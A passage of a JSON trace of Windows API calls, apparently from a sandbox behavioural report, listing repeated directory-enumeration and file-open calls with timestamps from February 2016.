"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,508", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,748", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,838", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": 